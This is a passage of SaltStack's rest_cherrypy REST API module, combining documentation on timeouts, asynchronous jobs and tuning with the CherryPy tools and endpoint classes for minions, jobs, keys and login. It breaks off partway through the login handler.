Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
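For example, an illustrative asynchronous run followed by fetching the job
return from the job cache (the ``jid`` in the second request is whatever value
the first response returns):
.. code-block:: bash
    # Start the job; the response contains the jid and the targeted minions.
    curl -b ~/cookies.txt -sSi localhost:8000 \\
        -H 'Content-type: application/json' \\
        -d '[{"client": "local_async", "tgt": "*", "fun": "test.ping"}]'
    # Later, look up the return for that jid:
    curl -b ~/cookies.txt -sS localhost:8000/jobs/<jid> \\
        -H 'Accept: application/x-yaml'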
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
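For example, a master config sketch with raised limits (the numbers are
illustrative starting points, not recommendations -- benchmark before and
after changing them):
.. code-block:: yaml
    rest_cherrypy:
      port: 8000
      thread_pool: 150
      socket_queue_size: 50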
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import os
import signal
import tarfile
from multiprocessing import Process, Pipe
logger = logging.getLogger(__name__)
# Import third-party libs
# pylint: disable=import-error, 3rd-party-module-not-gated
import cherrypy
try:
from cherrypy.lib import cpstats
except AttributeError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed. '
'Possible upstream bug: '
'https://github.com/cherrypy/cherrypy/issues/1444')
except ImportError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed.')
# pylint: enable=import-error, 3rd-party-module-not-gated
# Import Salt libs
import salt
import salt.auth
import salt.exceptions
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
from salt.ext import six
from salt.ext.six import BytesIO
# Import salt-api libs
import salt.netapi
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app`` setting must be configured and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
.. versionadded:: 2016.3.0
Verifies user requests against the API whitelist (user/IP pairs) in order
to provide whitelisting for the API similar to the master's ACL, but
enforced at the API layer.
.. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user %s from IP %s")
success_str = ("[api_acl] Authentication sucessful for "
"user %s from IP %s")
pass_str = ("[api_acl] Authentication not checked for "
"user %s from IP %s")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str, username, ip)
return True
else:
logger.info(failure_str, username, ip)
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str, username, ip)
return True
else:
logger.info(failure_str, username, ip)
return False
else:
logger.info(failure_str, username, ip)
return False
else:
logger.info(pass_str, username, ip)
return True
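# Illustrative evaluation of the yaml example in the docstring above:
#   user 'foo' from 8.8.4.4 -> allowed; user 'foo' from 1.2.3.4 -> denied;
#   user 'bar' from any IP -> allowed (its entry is '*');
#   any other user from 1.1.1.1 or 1.1.1.2 -> allowed via the '*' user entry.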
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug('Found IP list: %s', auth_ip_list)
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug('Request from IP: %s', rem_ip)
if rem_ip not in auth_ip_list:
logger.error('Blocked IP: %s', rem_ip)
raise cherrypy.HTTPError(403, 'Bad IP')
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == 'OPTIONS':
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = [
'Content-Type',
'X-Auth-Token',
'X-Requested-With',
]
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
# CORS requests should short-circuit the other tools.
cherrypy.response.body = ''
cherrypy.response.status = 200
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session['token'] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', salt.utils.json.dumps),
('application/x-yaml', functools.partial(
salt.utils.yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc:
# The TimeoutError exception class was removed in CherryPy 12.0.0, so
# only check for (and translate) TimeoutError here on CherryPy < 12.
# The check was moved down from the SaltClientTimeout except clause
# because a one-line conditional there raises a TypeError about
# BaseException inheritance.
if hasattr(cherrypy, 'TimeoutError') and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc())
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
if six.PY3:
response = salt.utils.stringutils.to_bytes(response)
return response
except Exception:
msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, collections.Mapping):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list): # pylint: disable=unsupported-membership-test
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
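# Illustrative example of the transformation above: an urlencoded body such as
#     client=local&tgt=*&fun=test.arg&arg=one&arg=two
# arrives as a single mapping, so it becomes the one-element lowstate
#     [{'client': 'local', 'tgt': '*', 'fun': 'test.arg', 'arg': ['one', 'two']}]
# while JSON and YAML bodies are expected to already be a list of such chunks.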
tools_config = {
'on_start_resource': [
('html_override', html_override_tool),
('salt_token', salt_token_tool),
],
'before_request_body': [
('cors_tool', cors_tool),
('salt_auth', salt_auth_tool),
('hypermedia_in', hypermedia_in),
],
'before_handler': [
('lowdata_fmt', lowdata_fmt),
('hypermedia_out', hypermedia_out),
('salt_ip_verify', salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(cherrypy.tools, tool_name, cherrypy.Tool(
hook, tool_fn, priority=(50 + idx)))
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.salt_token.on': True,
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, let's notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if 'token' in chunk:
# Make sure that auth token is hex
try:
int(chunk['token'], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, 'Invalid token')
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
@cherrypy.config(**{'tools.sessions.on': False})
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect # pylint: disable=unused-import
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = {'client': 'runner'}
if jid:
lowstate.update({'fun': 'jobs.list_job', 'jid': jid})
else:
lowstate.update({'fun': 'jobs.list_jobs'})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get('Result')
for minion in returns:
if u'return' in returns[minion]:
minion_ret[minion] = returns[minion].get(u'return')
else:
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>` function.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
if six.PY3:
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, BytesIO(pub_key))
tarball.addfile(priv_key_file, BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = len(fileobj.getvalue())
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
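# A minimal client-side sketch (assumes a rest_cherrypy server on https://localhost:8000
# and the example credentials from the docstring above) of fetching and unpacking the
# key tarball with the ``requests`` library:
#
#     import io
#     import tarfile
#     import requests
#
#     resp = requests.post('https://localhost:8000/keys', verify=False, data={
#         'mid': 'jerry', 'username': 'kickstart', 'password': 'kickstart', 'eauth': 'pam',
#     })
#     with tarfile.open(fileobj=io.BytesIO(resp.content)) as tar:
#         tar.extractall('/etc/salt/pki/minion')  # yields minion.pub and minion.pem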
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
